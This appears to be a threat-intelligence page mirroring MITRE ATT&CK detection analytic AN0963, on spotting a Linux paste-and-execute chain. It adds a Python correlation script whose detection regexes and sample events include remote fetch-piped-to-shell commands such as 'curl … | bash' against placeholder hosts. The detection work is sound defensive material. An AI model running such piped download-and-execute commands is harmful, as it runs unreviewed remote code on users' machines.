AN0963: Analytic 0963
User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress.
Analyst context for executives and security teams
This analytic describes a Linux user running a pasted shell command that retrieves or decodes content, executes it through a shell/interpreter, creates a short-lived file in temporary or cache locations, and then quickly reaches outbound. For leaders, the significance is that this pattern can bypass normal software deployment paths and turn a single terminal paste into unreviewed code execution and external connectivity.
Executive priority
Prioritize this as a control-validation and incident-readiness question for Linux workstations and servers: can the organization see interactive shell execution, temporary-file activity, and immediate egress well enough to decide whether a pasted command was legitimate administration or a potential compromise? It is relevant to SOC readiness, IR triage, acceptable-use governance, and audit evidence around endpoint logging and outbound network control.
Technical view
Validate coverage on Linux for bash/zsh terminal activity involving command chains that download or decode content and execute it via shell/interpreter behavior, followed by transient file creation under /tmp or ~/.cache and near-term outbound network activity. Because ATT&CK supplies no detection logic and no tactic mapping for this analytic, teams should treat it as a behavioral detection concept rather than a complete rule. Correlate process execution, command-line arguments, file creation/deletion, and network egress in a tight time window from the same user/session/host.
Likely telemetry
- Linux process execution events with command line and parent/child process context
- Interactive shell or terminal session evidence for bash/zsh where available
- File creation, modification, and deletion events under /tmp and ~/.cache
- Outbound network connection logs from the host, proxy, DNS, firewall, or EDR sensor
- User, host, session, and timestamp context to correlate execution, file activity, and egress
Detection direction
- Build correlation around sequence, not any single utility name: terminal-launched shell activity, retrieval or decoding behavior, execution by an interpreter, temporary/cache file use, and immediate outbound egress.
- Tune for expected administrative and developer workflows that legitimately use shell pipelines, package bootstrapping, or scripted installers.
- Prioritize high-fidelity context such as interactive user session, unusual destination, newly created transient file, and short time between execution and egress.
- Check blind spots where command-line logging is disabled, endpoint sensors do not capture shell pipelines, network logs lack host/user attribution, or /tmp and ~/.cache file events are not collected.
- Since no official detection text or relationships are supplied, validate locally with approved benign administrative scenarios before alerting broadly.
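To make the sequence-based correlation described in the list above concrete, here is an added example in Python that is not part of the ATT&CK object or the Glexia page. It runs the chain logic (interactive shell → retrieve/decode piped to an interpreter → transient file under /tmp or ~/.cache → outbound egress, same host/user/session, tight window) over constructed process, file and network events. The event schema, the 60-second window, the regexes and every sample value (hosts, users, paths, destinations) are assumptions chosen for illustration, and the two non-firing scenarios show the tuning points for scripted installers and ordinary package installs.

```python
"""Correlate a terminal paste-and-execute chain across process, file and network telemetry.

Added example; the event schema, the 60 s window and all sample values are assumptions.
"""
import re
from dataclasses import dataclass

# Stage 1: the pasted command retrieves or decodes content ...
RETRIEVE_OR_DECODE = re.compile(r"\b(curl|wget|base64\s+(?:-d|--decode))\b")
# ... and hands it to a shell or interpreter through a pipe.
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh|python3?|perl)\b")
INTERACTIVE_SHELLS = {"bash", "zsh"}          # parent process of a pasted command
TRANSIENT_DIRS = ("/tmp/", "/.cache/")        # /tmp and ~/.cache (any home directory)


@dataclass
class Event:
    ts: float       # seconds since epoch
    kind: str       # "process" | "file" | "network"
    host: str
    user: str
    session: str    # tty or session id that ties the three stages together
    detail: dict    # kind-specific fields (assumed names, see samples below)


def is_paste_exec(ev):
    """Interactive shell child whose command line retrieves/decodes and pipes to an interpreter."""
    if ev.kind != "process":
        return False
    cmd = ev.detail.get("cmdline", "")
    return (ev.detail.get("parent") in INTERACTIVE_SHELLS
            and ev.detail.get("tty") is not None          # scripted/CI runs have no tty
            and RETRIEVE_OR_DECODE.search(cmd) is not None
            and PIPE_TO_INTERPRETER.search(cmd) is not None)


def is_transient_file(ev):
    path = ev.detail.get("path", "")
    return ev.kind == "file" and ev.detail.get("op") == "create" and any(d in path for d in TRANSIENT_DIRS)


def is_egress(ev):
    return ev.kind == "network" and ev.detail.get("direction") == "outbound"


def correlate(events, window=60.0):
    """One finding per trigger process followed, within `window` seconds and in the same
    host/user/session, first by a transient file creation and then by outbound egress."""
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for i, trig in enumerate(events):
        if not is_paste_exec(trig):
            continue
        key = (trig.host, trig.user, trig.session)
        file_ev = net_ev = None
        for ev in events[i + 1:]:
            if ev.ts - trig.ts > window:
                break                                      # outside the correlation window
            if (ev.host, ev.user, ev.session) != key:
                continue                                   # different session: not this chain
            if file_ev is None and is_transient_file(ev):
                file_ev = ev                               # stage 2 must precede stage 3
            elif file_ev is not None and is_egress(ev):
                net_ev = ev
                break
        if file_ev and net_ev:
            findings.append({
                "host": trig.host, "user": trig.user, "session": trig.session,
                "cmdline": trig.detail["cmdline"],
                "transient_file": file_ev.detail["path"],
                "destination": net_ev.detail["dest"],
                "seconds_to_egress": net_ev.ts - trig.ts,
            })
    return findings


# Constructed telemetry (example.invalid / TEST-NET addresses; not real observations).
SAMPLE_EVENTS = [
    # A: interactive paste chain on ws-01 -> should fire
    Event(100.0, "process", "ws-01", "alice", "pts/3",
          {"parent": "bash", "tty": "pts/3", "cmdline": "curl -fsSL https://updates.example.invalid/setup.sh | bash"}),
    Event(101.0, "file", "ws-01", "alice", "pts/3", {"op": "create", "path": "/tmp/.s7Kd"}),
    Event(103.0, "network", "ws-01", "alice", "pts/3", {"direction": "outbound", "dest": "203.0.113.10:443"}),
    # B: routine package install, no retrieve/pipe pattern -> tuned out
    Event(200.0, "process", "ws-01", "bob", "pts/1",
          {"parent": "bash", "tty": "pts/1", "cmdline": "sudo apt-get install -y jq"}),
    Event(201.0, "file", "ws-01", "bob", "pts/1", {"op": "create", "path": "/tmp/apt-dpkg-install-abc"}),
    Event(202.0, "network", "ws-01", "bob", "pts/1", {"direction": "outbound", "dest": "198.51.100.7:80"}),
    # C: same pipeline from a non-interactive CI job (no tty) -> tuned out
    Event(300.0, "process", "build-02", "ci", "svc-1",
          {"parent": "bash", "tty": None, "cmdline": "curl -fsSL https://get.example.invalid/tool.sh | sh"}),
    Event(300.5, "file", "build-02", "ci", "svc-1", {"op": "create", "path": "/tmp/tool.sh"}),
    Event(301.0, "network", "build-02", "ci", "svc-1", {"direction": "outbound", "dest": "198.51.100.9:443"}),
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f)
```

Only scenario A produces a finding; B lacks the retrieve-and-pipe stage and C lacks an interactive tty, which is where the tuning for sanctioned installers and scripted bootstrapping lives. Widening the window or dropping the tty requirement trades false positives for coverage of chains that stage the file first and only later reach out.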
Mitigation priorities
- Ensure Linux endpoint logging captures process command line, parent process, user, and relevant file activity in temporary/cache directories.
- Apply least-privilege and administrative workflow controls so routine users do not need to run unreviewed pasted shell content for software installation or maintenance.
- Control and monitor outbound egress from Linux systems, especially servers that should not initiate arbitrary external connections.
- Document approved command-line installation and support procedures so SOC analysts can distinguish sanctioned activity from suspicious pasted-command execution.
- Use detection engineering and IR playbooks to require rapid collection of process tree, user session, temporary files, and destination evidence when this behavior appears.
Analyst notes and limits
This is a detection analytic object, not a technique object. The supplied ATT&CK fields identify Linux as the platform and describe a terminal-paste execution chain, but provide no official detection logic, tactic mapping, aliases, labels, or relationship context. Glexia’s interpretation therefore focuses on defensive validation and telemetry requirements rather than asserting specific adversary use.
The object does not include official detection text, related techniques, campaigns, groups, software, mitigations, or data sources. Local environment baselines are required to determine normal administrative shell usage, expected outbound destinations, and whether temporary-file behavior is suspicious.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 55b0598e1ced… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack, AN0963 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.